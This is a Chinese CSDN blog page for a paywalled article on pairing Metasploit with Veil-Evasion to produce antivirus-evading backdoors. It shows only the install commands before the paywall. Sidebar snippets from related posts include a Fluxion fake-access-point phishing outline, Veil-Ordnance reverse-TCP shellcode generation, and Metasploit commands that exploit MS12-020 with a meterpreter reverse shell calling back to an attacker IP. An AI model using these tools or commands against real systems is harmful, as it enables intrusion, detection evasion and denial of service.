免杀后门之MSF&Veil-Evasion的完美结合

最新推荐文章于 2024-03-09 22:50:48 发布
VIP文章 最新推荐文章于 2024-03-09 22:50:48 发布
阅读量1.3w 收藏 24
点赞数 1
分类专栏: 渗透测试 文章标签: 玄魂工作室 安全 免杀 metasploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xuanhun521/article/details/52821247
版权

本文由“即刻安全”投稿到“玄魂工作室”

Veil-Evasion 是 Veil-Framework 框架的一部分,也是其主要的项目。利用它我们可以生成绕过杀软的 payload !kali 上并未安装,下面我们来进行简单的安装。我们直接从 github 上进行 clone 下载:

git clone https://www.github.com/Veil-Framework/Veil-Evasion.git

图1

下载完成后,我们还需要对其软件配置包进行安装,依次输入如下命令:

复制代码 
lscd Veil-Evasion/lscd setup/ls./setup.sh
最低0.47元/天 解锁文章
玄魂
关注
  • 1
    点赞
  • 24
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
实战-Fluxion与wifi热点伪造、钓鱼、中间人攻击、wifi破解
玄魂工作室
08-18 3万+
a.扫描能够接收到的WIFI信号 b.抓取握手包(这一步的目的是为了验证WiFi密码是否正确) c.使用WEB接口 d.启动一个假的AP实例来模拟原本的接入点 e.然后会生成一个MDK3进程。如果普通用户已经连接到这个WiFi,也会输入WiFi密码 f.随后启动一个模拟的DNS服务器并且抓取所有的DNS请求,会把请求重新定向到一个含有恶意脚本的HOST地址 g.随后会弹出一个窗口提示用户输入正确的WiFi密码 h.用户输入的密码将和第二步抓到的握手包做比较来核实密码是否正确 j.这个程序是自动化运行的,并且
Veil-Ordnance:Veil-Ordnance是一种旨在快速生成MSF Stager Shellcode的工具
05-09
面纱军械 Veil-Ordnance旨在快速生成可用于漏洞利用或有效载荷的shellcode。 在@ christruncer,@ themightyshiv和@ harmj0y之间进行了多次讨论之后,我们得到了灵感。在这些讨论中,我们确定了需要一种生成shellcode的工具,而该工具不会改变我们的输出。 我们决定不依赖第三方来执行此操作,而是决定自己编写。 此工具中的所有有效负载均从Metasploit框架移植。 没有声称是任何有效载荷的原始作者。 在Metasploit项目上工作的出色人士都因在此工具中编写不同的有效负载而受到所有人的称赞。 他们的有效负载只是从Ruby移植到Python。 用法: ./Veil-Ordnance.py -p rev_tcp --ip 192.168.63.149-端口8675 例子: ./Veil-Ordnance.py -p rev_ht
MSFconsole进阶】evasion(免杀模块):免杀模块使用方法,相关设置
05-24 1488
【渗透工具】MSFconsole进阶:evasion(免杀模块)
MSF生成后门(制作各种shellcode攻击)
最新发布
tmzy1的博客
03-09 461
msfpayload,msfencode的结合体,可利用msfvenom生成后门(木马)程序,并在目标机上执行,在本地监听上线。进入msf命令:msconsole再执行msfvenom -h可得到命令帮助。
MSF使用教程
qq_45317844的博客
07-12 1255
run autoroute -s 192.168.159.0/24 #添加到目标环境网络,当你相连接一个网络发现不通的时候,可以设置一个路由试试,一般网络中没有设置围栏的情况下,是可以通的。-e, --encoder 指定需要使用的encoder(编码器),指定需要使用的编码,如果既没用-e选项也没用-b选项,则输出raw payload。timestomp C://2.txt -f C://1.txt #将1.txt的时间戳复制给2.txt。
MSF evasion模块的使用
永远是少年
06-10 513
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF evasion模块的使用。 一、木马文件生成 二、SHELL反弹检验
KaLi做木马渗透实战案例
开摆工作室(kbai.cc)
04-04 4442
KaLi做木马渗透实战案例
MSF:Web 后门
weixin_46104215的博客
11-21 1797
Web 后门泛指 WebShell,其实就是一段网页代码,包括 ASP、ASP.NET、PHP、JSP代码等。由于这些代码都运行在服务器,攻击者通过这段精心设计的代码,在服务器端进行一些危险的操作获得某些敏感的技术信息,或者通过渗透操作提权,从而获得服务器的控制权。(更具隐蔽性) Web 后门能提供非常多的功能,如执行命令、浏览文案、辅助提权、执行SQL语句、反弹Shell 等。 Windows 系统下比较出名的莫过于 “中国菜刀”,还有很多替代“中国菜刀”的跨平台开源工具...
Veil-Evasion安装及使用
渗透测试
08-03 1752
Veil-Evasion安装及使用 1.安装veil apt-get install veil 安装过程中有需要安装的软件全部点下一步即可 如果安装完有任何错误,可以cd到/usr/share/veil-evasion/setup/目录下重新启动setup.sh脚本 cd /usr/share/veil-evasion/setup/ ./setup.sh 过程和上一步相同,安装完成后,输入veil出现以下画面,说明安装成功
MSF后门生成及免杀思想
qq_68233961的博客
11-14 965
MSF后门生成及免杀思想
MSF给正常程序添加后门
永远是少年
06-10 1488
今天继续给大家介绍渗透测试相关知识,本文主要内容是MSF给正常程序添加后门。 一、后门制作 二、监听开启 三、效果检验 (一)软件查杀测评 (二)软件效果检验
解决VeilEvasion安装中git clone导致失败的问题
0pt1mus
01-11 1981
解决VeilEvasion安装中git clone导致失败的问题 0x00 原因 因为git clone在国内下载过慢的原因,在Veil安装时,下载依赖不成功导致安装失败。 因此,找到了一下详细的办法。 0x01 kali下安装Veil kali下安装只需要一行命令。 apt-get install veil-evasion 0x02 下载依赖 首先在以下地址下载VeilDependencies...
免杀工具--veil-evasion
11-21
这个东西下了好久的,用过都知道GitHub下载死慢的,就分享出来赚点积分吧
PHP-MSF 入门教程之服务&路由&应用
11-15
PHP微服务框架即“Micro Service Framework For PHP”,是Camera360社区服务器端团队基于Swoole自主研发现代化的PHP协程服务框架,简称msf或者php-msf,是Swoole的工程级企业应用框架,经受了Camera360亿级用户高...
项目管理利刃之MSF
03-03
本文将结合MSF在项目管理中的实际应用进行讲解,如果您是软件项目的参与者,如项目经理、开发工程师、系统架构师、顾问、质量管理人员等,想找到项目管理中遇到问题的解决方案,相信本文会给您一定的帮助。MSF为成功...
msf-with-rubymine:如何使用Ruby开发metasploit模块
04-10
msf-with-rubymine 如何在RubyMine中使用metasploit1.设置您的开发环境在第一步中安装软件包: : 2.在〜/ .msf4中添加一个Gemfile: # ~/.msf4/Gemfilesource 'https://rubygems.org'gem 'metasploit-framework', ...
Python-AV-Evasion:执行shellcode并使用python逃避AV检测
05-04
generate.py确实从给定的shellcode(从文件读取或由msfpayload / msfvenom插入)中生成python脚本(与以前的脚本类似),还可以选择添加Hyperion / Veil / 例如AV逃避)。 生成的脚本可以很好地与PyInstaller或类似...
价值1400美元的CEH(道德黑客)认证培训课程长啥样?(3)工具集
热门推荐
玄魂工作室
10-02 1万+
  价值1400美元的CEH(道德黑客)认证培训课程长啥样?(3)工具集   第一节《价值1400美元的CEH(道德黑客)认证培训课程长啥样?(1)课程体系》中,和大家过了一下CEH的课程内容,第二节《价值1400美元的CEH(道德黑客)认证培训课程长啥样?(2)实验室》 简单分析了CEH搭建实验环境的文档内容。 今天主要是一窥CEH强大的工具集面目。不过在正式开始之前,我先对目前...
msf之ms12-020的复现
05-24
MS12-020是远程桌面协议(RDP)中的一个漏洞,它可以允许攻击者通过发送恶意的RDP数据包来执行远程代码。MSFMetasploit框架)是一个开源的漏洞利用工具,可以用来测试和利用此漏洞。 以下是利用MS12-020漏洞的步骤: 1. 首先,需要使用Metasploit框架。如果你还没有安装它,请先到官网下载并安装。 2. 打开Metasploit框架控制台,输入以下命令: ``` use auxiliary/scanner/rdp/ms12_020_check ``` 这个命令将会检查目标是否存在MS12-020漏洞。 3. 如果目标存在漏洞,可以使用以下命令进行攻击: ``` use auxiliary/dos/windows/rdp/ms12_020_maxchannelids set RHOSTS <target IP address> exploit ``` 这个命令将会执行一个拒绝服务攻击,导致目标系统崩溃。这个攻击不会导致目标系统被入侵或数据被窃取,但是可以影响系统的可用性。 4. 如果你想要执行更危险的攻击,可以使用以下命令: ``` use exploit/windows/rdp/ms12_020_maxchannelids set RHOSTS <target IP address> set PAYLOAD windows/meterpreter/reverse_tcp set LHOST <attacker IP address> exploit ``` 这个命令将会执行一个远程代码执行攻击,使用Meterpreter反向Shell连接到目标系统。这个攻击可以让攻击者完全控制目标系统,包括执行任意命令、窃取数据等。 需要注意的是,利用漏洞进行攻击是非法的,只能在授权的环境下进行测试。同时,这个漏洞已经被修复,建议尽快更新你的系统以避免被攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值